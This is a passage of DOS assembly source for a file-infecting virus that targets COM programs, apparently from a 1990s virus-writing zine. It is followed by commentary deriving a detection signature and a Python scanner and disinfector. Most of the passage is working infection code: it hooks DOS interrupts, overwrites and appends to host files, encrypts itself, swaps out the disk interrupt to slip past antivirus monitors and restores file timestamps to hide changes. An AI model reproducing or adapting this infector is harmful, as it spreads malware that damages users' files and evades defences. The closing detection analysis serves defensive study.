jz execute ; continue if so
jmp short exitint21
nop
execute:
push ds
push cs
pop es
xor ax,ax
mov ds,ax
mov si,24h*4 ; get old int 24h
mov di,offset oldint24 ; handler
movsw
movsw
mov ax,cs:int24pointer
cli ; set new critical error
mov ds:24h*4,ax ; handler
mov ax,cs
mov ds:24h*4+2,ax
sti
pop ds
mov ax,3D00h ; open file read only
pushf
call dword ptr cs:oldint21
jc restore_exitint21
mov bx,ax ; handle to bx
call cs:infectpointer
pushf
mov ah,3eh ; close file
pushf
call dword ptr cs:oldint21
popf
jc restore_exitint21
push ds
cli ; subvert nasty disk
xor ax,ax ; monitoring programs
mov ds,ax
mov ax,cs:DOSdiskOFF
xchg ax,ds:13h*4
mov cs:DOSdiskOFF,ax
mov ax,cs:DOSdiskSEG
xchg ax,ds:13h*4+2
mov cs:DOSdiskSEG,ax
sti
pop ds
restore_exitint21:
push ds
xor ax,ax
mov ds,ax
mov ax,cs:oldint24
mov ds:24h*4,ax
mov ax,word ptr cs:oldint24+2
mov ds:24h*4+2,ax
pop ds
exitint21:
pop ax
pop es
pop di
pop si
pop bx
jmp dword ptr cs:oldint21
endint21:
infect:
push cx
push dx
push ds
push es
push di
push bp
push bx
mov ax,1220h ; get JFT entry for file
int 2Fh ; handle bx
mov bl,es:[di]
xor bh,bh
mov ax,1216h ; get associated SFT
int 2Fh ; entry to es:di
pop bx
mov ax,es:[di+11h] ; get file size
cmp ax,0F000h ; exit if too large
jb not_too_large
jmp errorinfect
not_too_large:
mov word ptr es:[di+2],2 ; set to read/write mode
mov ax,es:[di+11h] ; get file size (again)
mov cs:filesize,ax ; save it
mov ax,es:[di+0Dh] ; get file time
mov cs:filetime,ax ; save it
mov ax,es:[di+0Fh] ; get file date
mov cs:filedate,ax ; save it
push cs
pop ds
mov dx,4E9h ; buffer after the virus body (offset endvirus)
mov cx,3E8h ; read up to 3E8h bytes of the carrier's start
mov ah,3Fh ; Read from file
pushf
call dword ptr cs:oldint21
jnc read_ok
jmp errorinfect
read_ok:
mov bp,ax
mov si,dx
mov ax,'MZ' ; check if EXE
cmp ax,[si]
jne not_MZ
jmp errorinfect
not_MZ:
xchg ah,al
cmp ax,[si] ; check if EXE
jne not_ZM
jmp errorinfect
not_ZM:
push es
push di
push cs
pop es
mov si,100h ; check if already
mov di,dx ; infected
mov cx,offset endstart - offset start - 1
repe cmpsb
pop di
pop es
jnz not_already_infected
jmp errorinfect
not_already_infected:
mov word ptr es:[di+15h],0 ; SFT file position = 0 (write at start)
push es
push di
mov si,cs:infectpointer
add si,offset write_virus - offset infect
xor di,di
push cs
pop es
mov cx,offset end_write_virus-offset write_virus
cld
rep movsb
pop di
pop es
mov si,cs:infectpointer
add si,offset finish_infect - offset infect
push si
xor si,si
push si
push ds
cli ; subvert nasty
xor ax,ax ; antivirus programs
mov ds,ax
mov ax,cs:DOSdiskOFF
xchg ax,ds:13h*4
mov cs:DOSdiskOFF,ax
mov ax,cs:DOSdiskSEG
xchg ax,ds:13h*4+2
mov cs:DOSdiskSEG,ax
sti
pop ds
retn
write_virus:
push bx
call cs:encryptpointer ; encrypt virus
pop bx
mov dx,100h
mov ah,40h ; write virus
mov cx,offset endvirus - offset start
pushf
call dword ptr cs:origint21
pushf
push bx
call cs:encryptpointer ; decrypt virus
pop bx
popf
jnc write_OK
pop ax
mov ax,cs:infectpointer
add ax,offset infectOK - offset infect
push ax
retn
write_OK:
mov ax,es:[di+11h] ; move file pointer
mov es:[di+15h],ax ; to end of file
mov dx,offset endvirus
mov cx,bp
mov ah,40h ; concatenate carrier
pushf ; file's first few bytes
call dword ptr cs:origint21
retn
end_write_virus:
finish_infect:
mov ax,5701h ; restore file time/date
mov cx,cs:filetime
mov dx,cs:filedate
pushf
call dword ptr cs:oldint21
inc cs:infcounter
cmp cs:infcounter,10d ; after 10 infections,
jne infectOK
call cs:restoreint21pointer ; turn off virus
jmp short infectOK
errorinfect:
stc ; set error flag
jmp short exitinfect
infectOK:
clc ; clear error flag
exitinfect:
pop bp
pop di
pop es
pop ds
pop dx
pop cx
retn
endinfect:
db 0
endvirus:
int 20h
carrierencrypt:
mov word ptr cs:encryptpointer,offset encrypt
retn
end start
-------------------------------------------------------------------------------
DA
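One thing the listing settles for anyone writing detection: the eight code segments are shuffled and XOR-encrypted on every infection, so a signature over the body is worthless, but the entry stub at 100h (push cs:[startviruspointer] / push cs / pop ds / jmp cs:[encryptpointer]) is copied as-is, and the virus itself compares the first 11 of those bytes (offset endstart - offset start - 1) to decide whether a file is already infected. A scanner can use the same bytes. The file layout also follows from the listing: the body, from start to endvirus, is written at offset 0, and up to 3E8h bytes read from the front of the carrier are appended at the end; return_to_COM copies them back over 100h at run time. The Python below is an added example, not code from 40Hex or Phalcon/Skism. Its signature bytes (2E FF 36 27 01 0E 1F 2E FF 26 25) are worked out from the data layout in the listing (startviruspointer at 127h, encryptpointer at 125h), and the body length of 3E9h is taken from the read buffer at 4E9h, which has to coincide with offset endvirus for write_OK to append the right bytes; both are assumptions to confirm against a real sample. The cleaner reverses the layout. Because 3E9h body bytes overwrite the carrier but only 3E8h are saved, byte 3E8h of a carrier longer than that is no longer in the file; the cleaner leaves the virus's trailing zero there, which is also what the infected program runs with.

```python
from dataclasses import dataclass

# Constants derived from the listing (assumed offsets; confirm on a real sample).
SIGNATURE = bytes.fromhex("2EFF3627010E1F2EFF2625")  # 11 bytes the virus compares
VIRUS_LEN = 0x3E9   # offset endvirus - offset start: written at file offset 0
SAVE_LEN = 0x3E8    # bytes of the carrier read into the buffer and appended


@dataclass
class Layout:
    original_len: int   # carrier size before infection
    saved_off: int      # where the carrier's first bytes were appended
    saved_len: int      # how many of them (min(original_len, SAVE_LEN))


def is_infected(data: bytes) -> bool:
    """Same test the virus runs on a file before infecting it."""
    return len(data) >= VIRUS_LEN and data[: len(SIGNATURE)] == SIGNATURE


def layout(infected_len: int) -> Layout:
    """Undo the size arithmetic of write_virus / write_OK.

    A carrier longer than the body keeps its size (the body overwrites its
    first VIRUS_LEN bytes) and grows by SAVE_LEN; a shorter one is replaced
    entirely by the body and grows by its own length.  The one ambiguous
    size (VIRUS_LEN + SAVE_LEN) is treated as the short case; the byte that
    choice drops was overwritten anyway.
    """
    if infected_len > VIRUS_LEN + SAVE_LEN:
        original = infected_len - SAVE_LEN
        return Layout(original, original, SAVE_LEN)
    original = infected_len - VIRUS_LEN
    return Layout(original, VIRUS_LEN, original)


def disinfect(data: bytes) -> bytes:
    """Rebuild the carrier from an infected image."""
    if not is_infected(data):
        raise ValueError("no Bad Boy 2 entry stub at offset 0")
    lay = layout(len(data))
    head = data[lay.saved_off : lay.saved_off + lay.saved_len]
    if lay.original_len <= SAVE_LEN:
        return head                       # the whole carrier was saved
    # Bytes VIRUS_LEN..original_len-1 survived in place.  Byte SAVE_LEN was
    # overwritten by the body's last byte (the listing's trailing db 0) and
    # never saved, so data[SAVE_LEN] is kept as-is.
    return head + data[SAVE_LEN : lay.original_len]


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            blob = f.read()
        print(path, "infected" if is_infected(blob) else "clean")
```

Run it as `python scanner.py *.COM` to report per file; the disinfect() result should be written to a new file, not over the sample, so the original evidence survives. Note that is_infected() only asserts an unmodified entry stub: a variant that rewrites the two pointer offsets in the stub would need its own bytes.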